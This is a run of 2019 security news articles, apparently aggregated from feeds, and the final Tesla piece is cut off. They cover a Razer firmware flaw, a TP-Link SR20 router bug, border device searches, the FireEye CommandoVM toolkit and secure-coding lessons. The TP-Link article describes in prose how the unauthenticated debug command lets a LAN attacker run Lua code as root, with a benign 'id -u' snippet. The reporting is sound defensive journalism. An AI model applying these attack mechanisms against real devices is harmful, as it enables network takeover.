STE WILLIAMS

Razer – perfectly happy to sell you a laptop for over $2,000, but when it comes to fixing security holes… tough sh*t

Gaming PC specialist Razer has been singled out for leaving its motherboards vulnerable to a well-known and critical firmware vulnerability.

Infosec bod Bailey Fox said Razer’s Intel notebook models are still vulnerable to CVE-2018-4251, a security screw-up that potentially allows malware with administrative rights to alter the system’s firmware, thus allowing it to burrow deep into the PC and survive reboots and hard drive wipes. The issue has been known about since last year, and has been patched by manufacturers, but not by Razer, it seems.

“Razer has a vulnerability affecting all current laptops, where the SPI flash is set to full read/write and the Intel CPU is left in ME Manufacturing Mode,” Fox explained late last month.

“This allows for attackers to safeguard rootkits with Intel Boot Guard, downgrade the BIOS to exploit older vulnerabilities such as Meltdown, and many other things.”

The CVE-2018-4251 weakness was documented in public last June, after bug-hunters spotted that some Apple machines shipped with Intel’s Management Engine (ME) manufacturing mode left enabled, rather than disabled. System builders are supposed to write their core firmware to the motherboard flash then disable manufacturing mode.

If you have a software nasty on your computer with admin rights, it’s already a game-over situation: the code can spy on you, steal your data, and so on, and your next option is to delete the malware or wipe your storage and start from a clean backup. However, with the ability to write to and bury itself in your motherboard firmware via this left-open mode, the malware could ensure it survives a drive wipe or change, and evades detection from antivirus tools.

Such was the worry in October of last year when Apple moved to issue a security update to close the vulnerability in its gear.

If Fox is to be believed, and there is no reason to doubt the researcher, then Razer machines would be left open to similar types of attack. What’s worse, Fox claims to have been in contact with Razer, only to have the company decline to acknowledge and put out a fix for the issue.

The Register asked Razer for its side of the story, but at the time of publication we have yet to hear back from the gaming hardware giant.

In the meantime, gamers should be wary of attacks, but there is no reason to panic.

As we already stated, exploiting this bug would require the aggressor to have local admin-level access to the machine, and if a miscreant is running privileged code on your PC, there are about a thousand other things you’ll want to worry about before considering the integrity of your mobo firmware. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/03/razer_laptop_flaw/

TP-Link router zero-day offers your network up to hackers

Just last week, we talked in the Naked Security podcast about what you can do if you’re stuck with a router with security holes that you can’t easily fix.

One way this can happen is if your ISP won’t let you connect at your end unless you use a router provided by them.

These “forced routers” are typically locked down so you can’t update them yourself, and may even have remote access permanently enabled so that your ISP can wander in at will.

Our recommendation, when you’re faced with someone else’s router in your own home, is simply to treat it as if it were miles away at the other end of your phone line or cable connection, back in the ISP’s data centre or the phone company’s local exchange where you can’t see it.

Buy a second router (or get yourself the free Sophos XG Firewall Home Edition), plug the ISP’s router LAN (internal) port into the WAN (external) port of the device you look after yourself, and pretend the ISP’s equipment doesn’t exist.

Don’t bother with the Wi-Fi and firewall parts of the ISP’s router – just treat it as a straight-up modem that interconnects your home ethernet network with the phone, cable or fibre network used by your ISP.

Unfortunately, this router-inside-a-router approach isn’t always a viable one.

Here’s an example of when that solution breaks down: a Google security developer just released details of a bug in a type of home router that’s specifically designed to integrate with your home automation kit, and is therefore supposed to be your innermost router anyway.

The bug was found in the TP-Link SR20 router, a device that would be pointless to own if you chained it through another router to shield your own network from it.

In other words, your main reason for having an SR20 would be to set it up at the core of your home network, where it could work with your TP-Link “smart home” kit such as light bulbs, plugs and cameras, as well as interact with TP-Link’s special mobile app, Kasa.

Kasa is a pun, given that casa is the Latin word for the what Germanic languages such as English, Dutch and Swedish call a house/huis/hus, and is still used to mean house in many Romance languages, including Portuguese, Spanish, Italian and Romanian.

Fortunately, this TP-Link vulnerability isn’t remotely exploitable – by default, at least – so SR20 routers aren’t automatically exposed to attack from anyone out there on the internet.

But the bug itself is nevertheless serious, and is a handy reminder of what can go wrong when developers allow themselves to get stuck in (or at least, stuck with) the past, supporting old and insecure code alongside the latest, more secure version.

How did the bug come about?

The SR20 supports a proprietary protocol used by TP-Link for debugging.

Debug interfaces on hardware devices are often problematic, because they usually exist so that developers or support staff can get a detailed look into the guts of a unit, and extract (and sometimes modify) information and settings that would normally be protected from tampering.

Interestingly, one of the earliest internet viruses, the so-called Morris Worm of 1988, was able to spread thanks to a debug feature in the popular mail server sendmail.

This feature wasn’t supposed to be enabled on production servers, but many administrators simply forgot to turn if off.

The sendmail debug setting instructed the server to treat specially constructed emails not as messages but as a list of system commands to run automatically.

You could, quite literally, email a remote server a message that ordered it to infect itself, whereupon it would try to mail itself to the next guy, and so on, all without a password.

Well, for TP-Link SR20 owners, it’s 1988 all over again, although an attacker does need a foothold inside your network already.

Living with the past

Simply put, this bug involves what’s known in the jargon as a downgrade attack.

Apparently, early TP-Link routers would happily carry out debug commands for anyone who could send network packets to the LAN side of the router – you could access the debugging functions without ever supplying or even knowing a password.

That weakness was apparently patched by introducing a new set of “version 2” debug commands that only work if you know and provide the administrator password – a reasonable precaution that limits admin-level activity to admin-level users.

According to Google researcher Matthew Garrett, however, you can still persuade the router to accept some dangerous version 1 commands without needing a password at all.

You just ask the router nicely to fall back to the old days, before passwords were deemed necessary for debugging.

The buggy command in this case is number 49, known rather benignly as CMD_FTEST_CONFIG.

You’d hope that a command that did any sort of configuration test would, at worst, report whether the test passed or failed – but this command is much more general than that.

How does the bug work?

Garrett decompiled the relevant part of the debug server in TP-Link’s firmware and found that the CMD_FTEST_CONFIG works roughly like this:

  • You send the server a file_name and some arbitrary additional_data.
  • The server connects back to your computer using TFTP (trivial file transfer protocol) and downloads the file called file_name.
  • The server assumes that the data it just downloaded is a Lua program that includes a function called config_test().
  • The server loads the supplied Lua program, and calls the function config_test() with your additional_data as an argument.

Lua is a free, open source, lightweight scripting language from Brazil that is used in many popular security products including Wireshark and Nmap, and widely found in routers on account of its tiny footprint.

The TP-Link debug server runs as root – the Linux equivalent of the Windows SYSTEM and Administrator accounts combined – so its Lua scripting engine is running as root, so your supplied program is running as root, so your config_test() function runs as root, so you pretty much get to do whatever you like to the router.

The bad news here is that even if an attacker doesn’t know much about Lua, the language itself includes a built-in function called os.execute() that does exactly what its name suggests…

…and runs an operating system command of your choice.

Lua also has the handy function io.popen() that runs a system command, collects the output and returns it back to the program so that you can figure out what to do next.

-- Example Lua code to run a system command 
-- and retrieve the answer line by line...

uidcmd = io.popen('id -u')
getuid = uidcmd:lines()
if getuid() == '0' then
  print 'You are root!'
end

-- or simply...

if io.popen('id -u'):lines()() == '0' then print 'You are root!' end

In short, anyone who can send network traffic to the LAN ports on your router can pretty much control your network.

If your Wi-Fi is password protected, an attacker will need to know the Wi-Fi key (the one that’s typically written on the wall of the coffee shop), but that’s all – they won’t need the router password as well.

What happened next?

The bad part of this story is that Garrett says he never received any feedback from TP-Link after contacting the company via what seems to be its official Security Advisory page.

According to TP-Link:

Security engineers and other technical experts can [use this form] to submit feedback about our security features. Your information will be handled by our network security engineers. You will receive a reply in 1-3 working days.

But Garret says that a reply never arrived; he tried to follow up via a message to TP-Link’s main Twitter account, but still received no response.

Because his original report was made in December 2018, Garrett has now gone public with his findings, following Google’s policy that 90 days ought to be enough time for a vendor to deal with a security issue of this sort.

You might think it’s a bit casual to use Twitter as a medium for a formal notifications that says, “Dear Vendor, the official bug disclosure clock is ticking and you have 90 days or else,” but, as Garrett found, TP-Link’s official security feedback page offers no way to stay in touch other than to give the company your own email address and wait for a reply.

What to do?

  • If you’re part of the TP-Link security team, you probably want to acknowledge this issue and announce a date by which you can fix it, or at least provide a workaround. It feels as though simply turning off (or providing an option to turn off) unauthenticated access to the debugging server would be a quick fix.
  • If you’re a programmer, don’t run servers as root. Code that accepts data packets from anywhere on the network shouldn’t be processing those packets as root, just in case something goes wrong. If crooks find a vulnerability in your network code and figure out an exploit, why hand them root-level powers at the same time?
  • If you own an affected router, be aware that anyone you allow onto your Wi-Fi network can probably take it over rather easily using Garrett’s proof-of-concept code. In particular, if you run a coffee shop or other shared space, avoid using an SR20 for your free Wi-Fi access point.
  • Whichever brand of router you have, go into the administration interface and check your Remote access setting. At home, you almost never need or want to let outsiders see the inside of your network, so make sure that remote access is off unless you are certain that you need it.
  • If you are an IT vendor with an official channel for receiving bug reports, take care not to let any of them slip between the cracks. Provide a clear channel for future communications, such as a dedicated email address, where researchers can follow up if necessary.
  • If you’re in the marketing department and you see a technical message in your Twitter feed, find the right person to talk to inside the company and pass the message on. Don’t make it hard for people who are trying to help you.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/HaRWjJsBaeg/

Mystery of the Chinese woman who allegedly tried to sneak into Trump’s Mar-a-Lago with a USB stick of malware

A Chinese woman was caught sneaking into President Trump’s Mar-a-Lago country club with a thumb drive of malware, it was claimed yesterday.

Yujing Zhang, 32, was collared after possibly trying to slip into a bash at the swanky resort promoted by Li “Cindy” Yang, the former massage parlor boss who denies allegations she sold access to the president and his family.

Zhang had on her a thumb drive containing some unknown malware, plus four cellphones, a laptop, and an external storage drive, when she was nabbed by US Secret Service, it was claimed.

The software nasty could, of course, be run-of-the-mill crap that accidentally ended up on the USB stick, rather than some sort of scary spyware that was part of a deliberate plot to bug computers at Mar-a-Lago. We’ll probably find out soon enough: Zhang was charged [PDF] on Monday with making false statements to a federal officer, and entering restricted property.

It’s claimed Zhang, on March 30, tried to enter the president’s exclusive club in southern Florida by telling US Secret Service agents manning the gates that she wanted to use the pool, although she had no swimsuit.

When the g-men told her she wasn’t on the access list, a resort manager suggested she was the daughter of a member, to which Zhang gave an ambiguous nod, it was claimed – the agents suspected a language barrier was preventing her from fully explaining her situation.

wray

FBI boss: Never mind Russia and social media, China ransacks US biz for blueprints, secrets at ‘surprisingly’ huge scale

READ MORE

And so, with that, a valet was allowed to pick her up and drive her in through the grounds on a golf cart, it is claimed. However, Zhang couldn’t say where exactly she wanted to go, and was dropped off at the reception desk, it is alleged.

There, she tried to claim she was attending a United Nations Chinese American Association conference, an event that wasn’t scheduled, it was alleged, and was swiftly frogmarched off the property. She may have been referring to an event at the country club Yang earlier promoted on Chinese-language social media.

Zhang next explained to Secret Service agents that a friend called Charles she met online had asked her to fly from Shanghai, China, to Palm Beach, and find and speak to President Trump’s inner circle about Chinese and American biz relations, we’re told. That “Charles” may be Charles Lee, a Chinese event promoter who previously worked with Yang.

The g-men noted Zhang had no problem reading and speaking English.

She was cuffed and charged, and is due to appear in court on April 8. Her lawyer, public defender Robert Adler, declined to comment. If convicted, she faces up to five years in the clink and fines of up to $350,000.

There is no indication she is in any way connected to Yang nor Lee, nor that she got anywhere close to the president, who was staying at the club with his family that weekend. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/02/trump_china_malware_usb_stick/

Ex-Mozilla CTO: I was grilled for three hours at San Francisco airport by US border cops – and I’m an American citizen

Former Mozilla CTO Andreas Gal says he was interrogated for three hours by America’s border cops after arriving at San Francisco airport – because he refused to unlock his work laptop and phone.

Gal, now employed by Apple, today claimed he was detained and grilled on November 29 after landing in California following a trip to Europe.

He had attempted to pass through US customs via a Global Entry electronic kiosk. He wasn’t expecting a problem, since the Hungarian-born techie is now an American citizen, but it was not to be.

“On this trip, the kiosk directed me to a Customs and Border Patrol agent who kept my passport and sent me to secondary inspection,” Gal said. “There I quickly found myself surrounded by three armed agents wearing bullet proof vests. They started to question me aggressively regarding my trip, my current employment, and my past work for Mozilla, a non-profit organization dedicated to open technology and online privacy.”

Gal said the g-men were rather interested in his time at Firefox-maker Mozilla, and of his recent trip to Canada. They also went through his wallet and luggage, and this led to a request by the agents for Gal to unlock his Apple-issued iPhone XS and MacBook Pro, it is claimed.

Given the devices were emblazoned with big red stickers reading “PROPERTY OF APPLE. PROPRIETARY,” and he had signed confidentially agreements with Cupertino, Gal said he asked for permission to call his bosses and/or a lawyer to see if he would get into trouble by handing over access. When this request was repeatedly refused, we’re told, he clammed up, taking the Fifth, and citing constitutional rights against unwarranted searches.

Irked by Gal’s refusal, it is claimed, the border agents told him he had no constitutional nor any legal protections, and threatened him with criminal charges should he not concede to the search. He said he was eventually allowed to leave with his belongings, the devices still locked, and no charges were pressed. Gal said the agents did take away his Global Entry pass, which allows express entry through customs, as punishment for not complying with their demands.

How random is random?

Gal believes the ordeal was not a random search gone awry, but rather a targeted attempt by the government to send a message. Certainly more and more security researchers report being grilled by US border patrol, if they can even get a visa to enter the country, that is.

“My past work on encryption and online privacy is well documented, and so is my disapproval of the Trump administration and my history of significant campaign contributions to Democratic candidates,” Gal noted. “I wonder whether these CBP [Customs and Border Patrol] programs led to me being targeted.”

TSA gloves

US border cops told to stop copying people’s files just for the hell of it

READ MORE

Now, Gal has enlisted the help of the ACLU to probe into the brouhaha, and determine whether his civil rights were violated. The civil-liberties watchdog has filed a complaint [PDF] with the Department of Homeland security to determine whether the search violated the US Constitution and demand an investigation of whether the CBP’s entry policies are illegal.

“CBP’s baseless detention and intrusive interrogation of Andreas Gal and the attempted search of his devices violated his Fourth Amendment rights,” ACLU Northern California senior counsel William Freeman said of the complaint.

“Furthermore, CBP’s policies lack protections for First Amendment rights by allowing interrogation and device searches that may be based on a traveler’s political beliefs, activism, nation of origin, or identity.”

“As a matter of policy CBP can’t comment on pending litigation,” CBP told The Register. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/02/us_customs_mozilla_cto/

Major Mobile Financial Apps Harbor Built-in Vulnerabilities

A wide variety of financial services companies’ apps suffer from poor programing practices and unshielded data.

Mobile apps for financial services are an important part of many consumers’ financial lives, yet those apps are suffering a “vulnerability epidemic,” according to a new report.

The report, commissioned by Arxan and produced by the Aite Group, looks at the perceived security of mobile financial apps versus the reality. And in many cases, to quote a movie title from 1994, “Reality Bites.”

The report is based on research that decompiled the apps to their original source code for vulnerability assessment. For many of the apps, that step started the list of vulnerabilities, since application shielding should prevent threat actors from decompiling an application to do their own vulnerability assessment.

“Mobile apps in general lack the necessary security features to protect users data. Even with social engineering and mobile breaches occurring more often, app developers still are not developing apps with security in mind,” says Timur Kovalev, chief technology officer at Untangle.

Because the apps come from trusted financial institutions, consumers begin with the assumption that they are secure. “While users are comfortable using mobile apps for nearly anything and everything these days, the concerns for securing their money and financial information can make nearly anyone a little hesitant. And maybe with good reason,” says Nathan Wenzler, senior director of cybersecurity at Moss Adams, a Seattle-based accounting, consulting, and wealth management firm.

Wenzler points out that the players in the market are broadly divided between traditional financial institutions which are known for their legacy of security but often have woeful inexperience with agile app development and newer online financial institutions that who have less experience in the regulatory and security requirements in the financial sector, but have access to modern secure development methods.

Those differences in experience and expertise are borne out in the critical vulnerabilities found in the mobile apps: Retail banking apps have the greatest number of critical vulnerabilities, while the greatest number of severe findings came from auto insurance apps, which contained the most hard-coded private keys, API keys, and secrets in their code.

Other common vulnerabilities found in code across all sectors are hard-coded SQL statements and hard-coded private certificates that a threat actor could easily replaced and code around. 

The most secure mobile financial apps are those of banks that offer and service health savings accounts (HSAs), followed by health insurer mobile payment apps, and credit card issuers. Whether their apps are on the more or less vulnerable end of the scale, Wenzler says that institutions across the industry know that they must improve application security. “No matter who is providing the financial services, everyone [in the industry] realizes what’s at stake when to comes to their customers and their finances.”

Kovalev says that financial services companies should improve the security performance of their own development organizations while working with other organizations to boost security even further. “It is critical that developers start taking app security seriously and that app stores like Google Play Store and Apple App Store enforce stricter security standards for apps that have access to such sensitive data,” he says.

Wenzler is adamant that a failure to improve mobile financial app security could have huge consequences for banks and financial services companies. “Unlike many non-financial businesses, these banks won’t recover as easily from a breach of trust over their customer’s finances,” he says. And those financial services firms supporting mobile applications have a huge challenge in front of them, Wenzler says, since most start from a position of relative insecurity.

“Making application security an integral part of the development and DevOps processes is critical to creating confidence within the customer base that their money and information is secure, no matter how they choose to manage their banking tasks,” he says.

Related Content:

 

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/application-security/major-mobile-financial-apps-harbor-built-in-vulnerabilities/d/d-id/1334321?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

FireEye Creates Free Attack Toolset for Windows

The security services company releases a distribution of 140 programs for penetration testers who need to launch attacks and tools from an instance of Windows.

Kali Linux has become the standard tool for offensive security specialists, but for penetration testers who need native Windows functionality, there has not been a similarly maintained set of tools.

Security service firm FireEye aims to change that. The company released a collection of more than 140 open-source tools for Windows on March 28 that give red-team penetration testers and blue team defenders a curated collection of the top reconnaissance and exploitation programs. Dubbed Complete Mandiant Offensive Virtual Machine, or CommandoVM, the toolset allows security researchers to have a go-to Windows environment for offensive operations, says Jake Barteaux, a consultant for FireEye’s Mandiant and a co-creator of the toolset.

“Almost every penetration tester that I have worked with has their own version of a Windows machine that they use during internal pen tests,” he says. “Having that Windows machine is standard tradecraft for a lot of penetration testers. A lot of them will install many of the same tools that are included in Commando, but there hasn’t ever been a standard toolset for Windows testing.”

Toolset distributions for penetration testers solve two major problems. The first is finding the best penetration testing tools. Released in 2013, Kali Linux has some 600 security, reconnaissance and exploitation tools in its distribution, according to Offensive Security, the certification and training group behind the free distribution. CommandoVM contains many of the same tools, some of which work natively on a Windows machine inside a corporate network.

“They can use the VM as a staging area,” Barteaux says. “A lot of times, getting a beacon or getting some sort of command-and-control foothold on their own personal virtual machine allows them to pivot into the network easier.”

The second major problem for penetration testers is maintenance of their toolset, he says. Packaging up the programs in a distribution also allows for faster maintenance, making patching and updating easier. Kali Linux started out as a distribution that received occasional updates; now the toolset is a rolling distribution with updates multiple times a day.

Red team exercises, also known as penetration testing, allow companies to use employees or consultants to test their network and systems security. While automated scanning will often find issues, penetration testing allows security specialists to focus on digging deeper into potential vulnerabilities. In addition, such activities can help incident responders—blue teams—react more quickly and more knowledgeably to threats.

CommandoVM is based on FireEye’s FLARE VM platform for malware analysis and application reverse engineering. The distribution includes a variety of tools commonly used by offensive security testers, including the programming languages Python and Go, the network scanners Nmap and Wireshark, web-security testing frameworks such as BurpSuite, and Windows security tools, such as Sysinternals and Mimikatz. 

“We tried to make the tools easy for junior red teamers to pick up and [use] right away,” Barteaux says. “Another goal of mine to create it is to create a tool set. Even senior red teamers might be able to use it. It would be a good way to train people.” 

While Kali Linux has become the de facto penetration tester toolset in the past six years, there are times when a pen tester needs Windows, he says.

“Especially when you are red team-focused, you will not have a Linux machine sitting on the network that you can install Kali on,” Barteaux says. “You are going to pivot through a Windows machine on the network.”

A common attack, for example, is to use CommandoVM to create an Active Directory deployment to act as a beachhead into the network, allowing reconnaissance, credential attacks and other authentication-based compromises. In an example attack using the toolset, FireEye demonstrated identifying a web server running Jenkins, using Burp-Suite to brute force the login credentials and gain privileged execution on the server.

The CommandoVM distribution can be downloaded for Windows 7 or Windows 10 from Github. A list of all the tools in the distribution can be found on the Github Readme file.

Related Content

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/fireeye-creates-free-attack-toolset-for-windows-/d/d-id/1334318?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

War on Zero-Days: 4 Lessons from Recent Google & Microsoft Vulns

When selecting targets, attackers often consider total cost of ‘pwnership’ — the expected cost of an operation versus the likelihood of success. Defenders need to follow a similar strategy.

Recently, two in-the-wild exploits for zero-day vulnerabilities in Google Chrome and Microsoft Windows were disclosed by Google’s TAG (Threat Analysis Group). The event made headlines, but it’s not a new story: a zero-day vulnerability under active attack is discovered, vendors scramble to issue patches and companies scramble to deploy these patches. Substantial cost is incurred each step of the way. (For reference, Google patched the Chrome zero-day [CVE-2019-5786] and Microsoft patched the Windows 7 zero-day [CVE-2019-0808].)

The bad news is we’ve been doing this dance for decades. The good news is that some pockets of the industry have invested significant time and energy into reducing the impact and frequency of attacks that leverage zero-day vulnerabilities. In fact, Google and Microsoft are among the leaders in this space.

What can software companies that lack the security budget of tech titans learn from this latest event, and what can IT managers/CISOs/enterprise decision makers learn to inform product decisions? Here are four strategies to consider:

Software Developers: Adopt a Healthy Skepticism of Unsafe Languages
Unsafe languages (C, C++, Objective-C) are unsafe. There are various definitions of safe, of course, but the C language family doesn’t qualify for any of them. Treat unsafety for what it is: cost, risk and liability. Consider Rust or Go among a range of alternatives.

On the surface, it may appear cheaper to develop in a language that’s perhaps more familiar, but you need to consider the total cost of ownership (TCO) of that choice. If you want to use an unsafe language to build a safe product, you’ll need to invest in exhaustive unit tests, handle any current and future undefined behavior, accommodate cross platform differences, and maintain a fuzzing suite — at a minimum. Like Google and Microsoft, you’ll need processes in place for when all these things fail to identify an issue — and they will.

If you’re starting a new project, there are very few compelling reasons to build in an unsafe language. Reasons typically given include:

  • Project performance is critical and even minimal overhead is unacceptable,
  • Platform does not support a safe language, and the
  • Project will never handle untrustworthy input.

The cost gap of the first two is closing daily and the last is undecidable. It’s unlikely, for example, that the developers of Ghostscript anticipated untrustworthy input via thumbnail processes in Gnome.

If you’re maintaining an existing unsafe-language project, consider piecemeal conversion of that codebase to a safe language. Mozilla has been doing that with Firefox, that is rewriting various unsafe language portions of the browser in Rust.

Enterprises: Don’t Use Outdated (Even if Supported) Operating Systems
What does it cost to upgrade your enterprise from Windows 7 to Windows 10? This can be difficult to quantify. What is perhaps even more difficult to quantify is the value gained from a modern operating system — but both are equally important for calculating an accurate TCO.

The aforementioned zero-day exploit in Windows made use of a null pointer dereference vulnerability in win32k.sys. This class of vulnerability is not exploitable on Windows 8+ and Windows 10 provides additional controls to app developers that substantially reduce the attack surface of this module. Continuing to run an outdated operating system comes with security cost.

You can’t patch your way to security, yet patches are typically all you get with an outdated operating system. Windows isn’t alone; macOS and Linux deploy new and fix existing exploitation mitigations with each release. By using outdated software, you don’t reap these benefits.

Software Engineers: Know Your Attack Surface
Zero-day vulnerabilities in widely deployed software are worth money — sometimes a substantial amount of money. Gone are the days when security researchers disclosed zero-day on infosec conference attendees. The meat of many presentations at today’s offensive-oriented conferences is exploration of previously unknown, unexplored attack surfaces in commodity software.

You need to identify all the ways your product might interact with untrustworthy input — your attack surface. Intended use cases are the tip of the iceberg. Some of the best value you could get out of a third-party audit is to learn new ways of interacting with your software.

Software Developers: Identify, Track, and Sandbox Untrustworthy Input
Once you’ve mapped out your attack surface, track and contain the usage of that untrustworthy input — and consider sandboxing the code responsible for handling it. The Chromium developers (including Google) have done an excellent job of describing Chrome (Chromium’s) sandbox design. Use this as inspiration: directly build on it (the code is very liberally licensed) or use Google’s just-released Sandbox API. Adobe built on Chromium’s sandbox almost a decade ago, reducing the impact of PDF parsing vulnerabilities in Adobe Reader. If in doubt, consult Chromium’s Rule of 2.

Both: If You Must Run/Develop Unsafe-Language Code, Use Exploit Mitigations
If your software product is locked into an unsafe language, there is no excuse to not leverage exploit mitigations offered by your compiler and target operating system.

Valve’s Steam (think iTunes for games) contained multiple vulnerabilities that attackers leveraged to install malware on players’ machines. In a separate report, Steam was vulnerable to a classic stack-based buffer overflow in the way it parsed game information. Exploitation was made simple by lack of stack protection, a protection available in various forms for over a decade. Don’t be like Valve.

Exploit mitigations are no substitute for choosing to develop in a safe programming language. If you must maintain or develop in an unsafe language, enable them as a matter of course, but do not rely on them as a reason to delay moving to a safe language. If you’re responsible for deploying software, use the exploit mitigations available to you.

When selecting targets, attackers often consider total cost of “pwnership” — the expected cost of an operation versus the likelihood of success (times expected value) As a defender or a software engineer, conduct the same analysis — and consider the way your choices affect the security of software development and deployment.

Related Content:

 

 

 Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Paul Makowski’s interests include exploitation, program analysis, vulnerability research, reverse engineering and cryptography.
Prior to co-founding PolySwarm, Paul reverse engineered implants and wrote bespoke malware disinfection tools for Fortune 100 clients. Paul … View Full Bio

Article source: https://www.darkreading.com/application-security/war-on-zero-days-4-lessons-from-recent-google-and-microsoft-vulns/a/d-id/1334289?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Women Now Hold One-Quarter of Cybersecurity Jobs

New data from ISC(2) shows younger women are making more money than
in previous generations in the field – but overall gender pay disparity persists.

Women now actually make up 24% of the cybersecurity workforce – a seismic shift from the perennially static 11% number over the past six or more years. But this new data point, revealed today by ISC(2), comes with a caveat: It now counts women in IT whose daily jobs entail security responsibilities.

ISC2 retooled its survey data this year to include men and women in IT jobs where at least 25% of their day encompasses security tasks and issues to better reflect the scope of the job sector. That means it’s difficult to infer from the new ISC(2) data whether there has been significant growth in women cybersecurity professionals or whether women without cybersecurity-related job titles merely had gone uncounted in past surveys by ISC(2) and other organizations.

Cybersecurity Ventures said in a study last year that women would make up over 20% of the overall cybsersecurity market by the end of 2019.

While one-fourth still represents a relatively low ratio of women to men, the study shows a clear female youth-movement in security: Millennial women now make up 45% of women in the industry, compared with Millennial-age men, who make up 33% of their gender sector. That’s a shift from Generation X, which accounts for 25% of women and 44% of men in cybersecurity.

Mary-Jo de Leeuw, ISC(2) director of cybersecurity advocacy for the EMEA region, says the uptick in younger women entering the cybersecurity field stems from a cultural change as well as earlier exposure to technology and the presence of female role models in tech.

“They grew up in a digital world” and come from a culture where the Internet permeates their lives, according to de Leeuw, who has been involved with various organizations promoting cybersecurity skills and training for women and girls. “They’re used to being part of all cyber things around them, so they can also focus on being part of cybersecurity and part of the digital world.”

Not only are young girls – and boys – gradually getting more tech exposure at an earlier age, but cybersecurity education is emerging, with more undergraduate and graduate programs.

“When I was growing up in the industry, there wasn’t any type of academia around cybersecurity, even at the college level. Security experience mostly came from government and niche roles and backgrounds,” says Jennifer Minella, chairperson on the (ISC)2 board of directors and vice president of engineering and security at Carolina Advanced Digital.

Now there are programs, such as the CyberPatriot youth cyber education initiative for K-12, that provide cybersecurity exposure and education, according to Minella. “It’s reaching down to people at a younger age now,” she says.

Meanwhile, the gender pay gap hasn’t budged. Women still make less than men overall: While nearly 30% of men in the US make between $50,000 to $99,999, just 17% of women do. One-fifth of men make $100,000-plus, while 16% of women do. Overall, women make $5,000 less than men in security management positions, according to the ISC(2) report.

Millennial women, however, are making better salaries than previous generations of women. Twenty-one percent of Millennial women earn $50,000 to $99,999, compared with 29% of Millennial men. Even more interesting, 3% more Millennial women than men of that generation make $100,000-plus.

Just 10% of Baby Boomer women fell into the $50,000 to $90,000 salary scale, compared with 30% of Boomer men. As for Generation X, there was a 12% gap between men making $50,000 to $99,999. And 12% more Baby Boomer men make $100,000-plus than women of that age group.

“The pay gap was still [about the same],” de Leeuw says. “The next step is getting equal pay for women. … We’re getting there.”

ISC(2)

Interestingly, more women are filling some of the higher-level job positions than men: Seven percent of women in the survey are chief technology officers, versus 2% of men; 9% are vice presidents of IT, versus 5% of men; 18% are IT directors, versus 14% of men; and 28% of women are C-level executives, versus 19% of men. There were 15 female CISOs in the study, compared with 32 male CISOs.

Women Better Schooled
Women hold more post-graduate degrees than men, 52% versus 44%, and women consider certifications and grad school more valuable than men do, according to the study. Women, on average, hold more certs than men.

The advanced degree and certification statistics follow a trend ISC(2) first spotted in its 2015 women in cybersecurity report, where 58% of women in senior positions held a master’s degree or a doctorate, while 47% of males in leadership positions did. That study also showed women dominated the governance, risk, and compliance (GRC) sector of security, however: One in five women in security held a GRC position, while just one in eight men did.

In a similar vein, a recent International Association of Privacy Professionals (IAPP) study of the Fortune 100 top publicly traded companies showed more women (53%) than men (47%) in the privacy profession in the US. The chief privacy officer position is twice as likely to be a woman than a man, that data shows. 

[Hear Angela Dogan, director of vendor risk and compliance services at Lynx Technology Partners, present Cybersecurity Careers: Is There More Than IT?, at Interop 2019 next month]

Even so, there’s still a wide gender gap in cybersecurity.

“Twenty-four percent is a nice baseline from where can move forward,” ISC(2)’s de Leeuw says. She hopes it will inspire more women to enter the cybersecurity sector.

“This is a huge step,” she says. “When I founded Women in Cybersecurity in 2012 in Holland, we had only four women working in cybersecurity. I knew all of them in the entire country. Compare that to where we are today, with women making up 24% of the [overall cybersecurity] workforce.”

Related Content:

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/risk/women-now-hold-one-quarter-of-cybersecurity-jobs/d/d-id/1334319?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Wrecked Teslas hang onto your (unencrypted) data

A Tesla gets run down by a truck hauling a jet engine. Ouch.

The car winds up in a salvage lot in Maryland. The driver, hopefully, doesn’t wind up in a hospital. But the video of it all remains, safe and sound, on that wrecked car, unencrypted and available for all to see.

If you want to see the video of a Tesla and its collision with a jet engine, or videos of Teslas careening off of snowy roads and/or plowing into trees, you can check out #TeslaCrashFootage on Twitter.

You’re able to do so because crashed Teslas being sold at junkyards and auctions are retaining what CNBC says is “deeply personal” and unencrypted data, including video from the car’s cameras that show what happened moments before the accident.

The unencrypted videos – plus phonebooks, calendar items, location and navigational data – were extracted by a security researcher who calls himself GreenTheOnly. The researcher retrieved the content from Model S, Model X and Model 3 vehicles purchased for testing and research from salvage.

GreenTheOnly, who identifies himself as a white hat hacker and a Tesla fan who drives a Model X, agreed to speak with CNBC and to share data and video with the news outlet on the condition of “pseudonymity,” citing privacy concerns. CNBC identifies the researcher as a “he,” so we’ll follow suit. He’s reportedly made tens of thousands of dollars from Tesla bug bounties in recent years.

Tesla’s split personality WRT privacy

